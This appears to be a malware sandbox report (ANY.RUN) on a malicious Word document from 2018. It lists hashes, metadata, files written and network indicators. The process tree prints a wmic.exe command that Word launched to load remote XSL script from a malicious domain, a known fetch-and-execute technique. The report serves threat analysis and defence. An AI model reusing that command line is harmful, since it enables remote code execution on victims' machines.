File name: | 4d293095a51096689dab4ef417a0ab6fd4e2bd7bb96c0781f7f24ada1ea4cd3a.doc |
Full analysis: | https://app.any.run/tasks/91e401c2-0aa1-49b3-9ac1-932256c16931 |
Verdict: | Malicious activity |
Analysis date: | May 24, 2019, 11:52:17 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: Trevor Alexander, Template: Normal.dotm, Last Saved By: Trevor Alexander, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Total Editing Time: 01:00, Create Time/Date: Tue May 15 20:33:00 2018, Last Saved Time/Date: Tue May 15 20:34:00 2018, Number of Pages: 1, Number of Words: 3, Number of Characters: 18, Security: 0 |
MD5: | A45180639D473D6613C84AE0E1275CB8 |
SHA1: | F65EDB50C315D74252A2A1B34044AAD432803B52 |
SHA256: | 4D293095A51096689DAB4EF417A0AB6FD4E2BD7BB96C0781F7F24ADA1EA4CD3A |
SSDEEP: | 192:qPB3f+9M9KRuPoLlLZEvA+6/6rupx+uh9Xy:8KqKx8iSupx+YX |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | - |
---|---|
Subject: | - |
Author: | Trevor Alexander |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | Trevor Alexander |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | 1.0 minutes |
CreateDate: | 2018:05:15 19:33:00 |
ModifyDate: | 2018:05:15 19:34:00 |
Pages: | 1 |
Words: | 3 |
Characters: | 18 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 20 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3328 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\4d293095a51096689dab4ef417a0ab6fd4e2bd7bb96c0781f7f24ada1ea4cd3a.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2812 | "C:\WINDOWS\System32\Wbem\wmic.exe" os get name /format:"http://irsdeliquent.com/index.php?token=LV5H053O&x" | C:\WINDOWS\System32\Wbem\wmic.exe | WINWORD.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: WMI Commandline Utility Exit code: 44210 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3328 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRF6FF.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3328 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:17222E7BED955763CB75EBDA153E0074 | SHA256:EAEB163582F92B56C14963150DA7DBEA34565552F3D187A793BE19BEB0978882 | |||
3328 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CBB933D5.emf | emf | |
MD5:829A79D0F4AEBF9A47C1F2D04F29FD40 | SHA256:7F23544CC9F516B7F13FB373DE498AE5D04599E1C286AFC72255565F75895BE6 | |||
2812 | wmic.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\index[1].htm | html | |
MD5:84D29F494E144EDCF36D26166153445A | SHA256:D5108648901E8B62AFC22AA1DBD753F9B0C027CE8F8893DCFF9702048266A63E | |||
3328 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\wmic_deploy.lnk | lnk | |
MD5:5BC10175464461AC8A730958992C9553 | SHA256:AE556BB14F2CD07B3B59369E4135160D6A7779107CEE4935D2C1649A3625C42B | |||
3328 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$293095a51096689dab4ef417a0ab6fd4e2bd7bb96c0781f7f24ada1ea4cd3a.doc | pgc | |
MD5:29FB10C4B0E944C3FE8E6432000D6974 | SHA256:34E37A52EA859AFAA8692A98378AB152759A0285F8CB60DC175ABE6CB3E7D02E | |||
2812 | wmic.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\loose[1].dtd | html | |
MD5:2250378D67D68CBF544E84787FFA52B4 | SHA256:1B46C62C9586E9519ED6E5357E56B32F7E1CC7D797B053CFF0784B17EAC5C008 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2812 | wmic.exe | GET | 200 | 104.160.36.51:80 | http://irsdeliquent.com/index.php?token=LV5H053O&x.xsl | US | html | 2.81 Kb | malicious |
2812 | wmic.exe | GET | 200 | 128.30.52.100:80 | http://www.w3.org/TR/html4/loose.dtd | US | html | 10.2 Kb | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2812 | wmic.exe | 104.160.36.51:80 | irsdeliquent.com | Nodes Direct | US | suspicious |
2812 | wmic.exe | 128.30.52.100:80 | www.w3.org | Massachusetts Institute of Technology | US | whitelisted |
Domain | IP | Reputation |
---|---|---|
irsdeliquent.com |
| malicious |
www.w3.org |
| whitelisted |